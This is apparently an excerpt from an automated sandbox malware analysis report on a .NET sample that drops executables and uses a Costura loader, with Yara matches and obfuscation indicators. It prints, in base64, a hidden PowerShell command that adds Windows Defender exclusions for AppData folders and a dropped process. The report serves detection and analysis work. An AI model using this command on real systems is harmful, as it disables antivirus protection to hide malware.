Source: TypeId.exe.0.dr, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.file.exe.84e6078.17.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.2.file.exe.84e6078.17.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.2.file.exe.84e6078.17.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.2.file.exe.84e6078.17.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.2.file.exe.84e6078.17.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 0.2.file.exe.6f80000.15.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.file.exe.6f80000.15.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.file.exe.6f80000.15.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 0.2.file.exe.6e10000.14.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.2.file.exe.6e10000.14.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.2.file.exe.6e10000.14.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.2.file.exe.6e10000.14.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.2.file.exe.6e10000.14.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
Yara detected Costura Assembly Loader
Source: Yara match File source: 0.2.file.exe.459c2e8.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.81dfff8.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.8167fb8.22.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.4a62b70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.81dfff8.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.4da8708.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.467db08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.818ffd8.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.459c2e8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.8167fb8.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.6d60000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.94c0000.24.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.7596838.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.818ffd8.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.txxbiwtbs.exe.7c40000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.4c760c8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2976520133.000000000309D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1763526633.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1995844689.00000000029BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3095261684.0000000007491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2219301967.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2976520133.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1784663616.0000000006D60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3019858995.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1818030083.00000000094C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1995844689.000000000289B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1763526633.0000000003526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1790879005.0000000007CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: TypeId.exe PID: 7764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 8028, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: txxbiwtbs.exe PID: 3624, type: MEMORYSTR
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06100448 push es; retf 0_2_06100DAC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06104D2D push es; iretd 0_2_06104D4C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06100DE0 push es; retf 0_2_06100E4C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06100DE3 push es; retf 0_2_06100E4C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06E0459A push ebp; iretd 0_2_06E0459B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06E03106 push esp; iretd 0_2_06E03109
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_071029E9 push eax; retf 0_2_071029F6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_09E55BE0 push ebp; iretd 0_2_09E55BE1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_09E55FB2 push ecx; iretd 0_2_09E55FB3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_09E57361 push edx; iretd 0_2_09E57368
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B99D2A5 pushad ; iretd 1_2_00007FFD9B99D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BB82316 push 8B485F93h; iretd 1_2_00007FFD9BB8231B
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_06D55202 push esp; retf 3_2_06D55209
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_06D65C8F push es; retf 3_2_06D65CB8
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_06D604A1 push es; retf 3_2_06D604A4
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_075FB705 push FFFFFF8Bh; iretd 3_2_075FB707
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_075FB475 push FFFFFF8Bh; iretd 3_2_075FB477
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_07A7459A push ebp; iretd 3_2_07A7459B
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_07A73106 push esp; iretd 3_2_07A73109
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_07C739A8 push eax; retf 07B2h 3_2_07C73E89
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_07C73300 pushfd ; ret 3_2_07C73349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08ADF3E6 push 0B58158Dh; ret 4_2_08ADF3EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08ADE79B push cs; ret 4_2_08ADE79C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A3B6E01 push 8B04568Bh; retf 4_2_0A3B6E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A3B6FBD push 8B0476FFh; retf 4_2_0A3B6FC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A3B6D74 push 8B04568Bh; retf 4_2_0A3B6D81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A9A2F91 push cs; ret 4_2_0A9A2F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A9A2F11 push cs; ret 4_2_0A9A2F12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A9A103F push cs; ret 4_2_0A9A1040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A9A2836 push cs; ret 4_2_0A9A2837
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A9A29E9 push eax; retf 4_2_0A9A29F6
Source: 0.2.file.exe.459c2e8.6.raw.unpack, OVAC5LcmtgojpkhnNKb.cs High entropy of concatenated method names: 'I9M4QO4qB2a0IXiJetI', 'b6wj1A4aYmFuI0OhGoj', 'Iq5ou9bf1s', 'aAjRmY46l9nRDybJZAs', 'hF7CKc4JBtaJDC4fcIW', 'IIudEc4UKfLbr0oA3uh', 'yKnaIq4b7l4t2has25F', 'CGgZxt4mLE0QvjZde3S', 'kDQRMv4ORicQjvOUf1h', 'VdinR24lwqPMsw03Gur'
Source: 0.2.file.exe.459c2e8.6.raw.unpack, AssemblyLoader.cs High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'Wu1953XvgCs8K9qZkQt'
Source: 0.2.file.exe.459c2e8.6.raw.unpack, Wqs5URts4KOjaidB9QJ.cs High entropy of concatenated method names: 'YBNaqvLQSi', 'pvCaaUlNbv', 'VkoaBc4DHI', 'WUKawN2oxw', 'J85a9UGWOg', 'heEa6lZuUB', 'paNaJeg9e4', 'eeyiRIndE8', 'WHkaUGJDqh', 'tw4abJLijJ'
Source: 0.2.file.exe.459c2e8.6.raw.unpack, gWwFh6uutZrgsqwKKY.cs High entropy of concatenated method names: 'TBIgfxPCab', 'TJ1ggw33WF', 'e6fgrHXbEm', 'hu3gYoFsZN', 'fNPgTxIx2Q', 'CdRgCV1Li1', 'IILgpN3iiP', 'RAmgcXnOiK', 'Bd7goHmTqU', 'LRWgtVbJQT'
Source: 0.2.file.exe.459c2e8.6.raw.unpack, Wbs8nJYojjAvBw9Hhml.cs High entropy of concatenated method names: 'D1EYiO6J8K', 'xwTYRgTVux', 'vJlY0SGosW', 'zq2Yxyrt08', 'aP0IboXq4hTeF0gQ9wJ', 'dVxZKYXa6LclnuJ5ee6', 'pQ9JfpXBPiH7T4Vcrta'
Source: 0.2.file.exe.459c2e8.6.raw.unpack, J6tGnyHiUI5UPRSjfZ.cs High entropy of concatenated method names: 'U70jBSXn5', 'dMqLWJfnG', 'IrkEltLsS', 'Fr978ENva', 'To5PjKBDa', 'ITtn1AeTu', 'vJgMmdatA', 'US5AQ3bYV', 'T6m0dnkB6kSpsMRXfpN', 'lQsld7kw4Lynf8VnZrJ'
Source: 0.2.file.exe.459c2e8.6.raw.unpack, Khmx1Yt6SBxTndHcLiS.cs High entropy of concatenated method names: 'yA0DXaCBy7', 'PLKD8ijtF0', 'rK8Nbk4VQ8s3xgVtxaM', 'uhkw3u4DDAijN7TSpEl', 'bZsmiM4SaUIiCG2pVVO', 'Jf4qWj4slcbkra3Lago', 'BV8jOd4vtlorEUV1k4C', 'ceUqK84HTAtTTIEGh89'
Source: 0.2.file.exe.459c2e8.6.raw.unpack, qHLtQPrzIOZ8bY0fBih.cs High entropy of concatenated method names: 'sayYgnSNDo', 'yw9YryL69X', 'OYPYYS8uP8', 'dCgYTJMxJc', 'tarYCPE8Af', 'iXGYp6FjBE', 'JQqf0cXfrZlBlmrY9Ly', 'vyxcZ7XgJHoWaIVFIRE', 'tM0wuAXrTnrcQ6M49E3', 'JpoKKlXY78EwjY9LQAg'
Source: 0.2.file.exe.459c2e8.6.raw.unpack, EgOZ8Bh7IS3c7wI5eg.cs High entropy of concatenated method names: 'zofQGtWwY', 'SXb5B6n9S', 'q7feUEnuH', 'lIMZYRRiF', 'X7gKuDU4u', 'MvQ1Qs4Zp', 'sZuywDECs', 'A0Md2IxGc', 'i7rkK8RKD', 'rQnXW5MIl'
Source: 0.2.file.exe.459c2e8.6.raw.unpack, bkFcHwrdJkSsEUL23AN.cs High entropy of concatenated method names: 'IFIrSDbbfZ', 'nkSrsQu8BQ', 'WSUrXoqqL2', 'kKQr8IubBs', 'XAwr4AQGkp', 'zYsrNIbDl4', 'UDmryF56xR', 'KA5rGsPscL', 'lwArVbRcYJ', 'xQKrD1Cov0'
Source: 0.2.file.exe.459c2e8.6.raw.unpack, osNFZZtOwYpFwvRLpuE.cs High entropy of concatenated method names: 'KB1tkQBP5t', 'G10tXsrmIG', 'cxyt85MoHy', 'JOot4HCWPf', 'oTOtNGNTer', 'jf3tyldlb6', 'P6gtGjc00v', 'n5ktVm1yqV', 'JdstDuUIVQ', 'VAVtSjaiid'
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
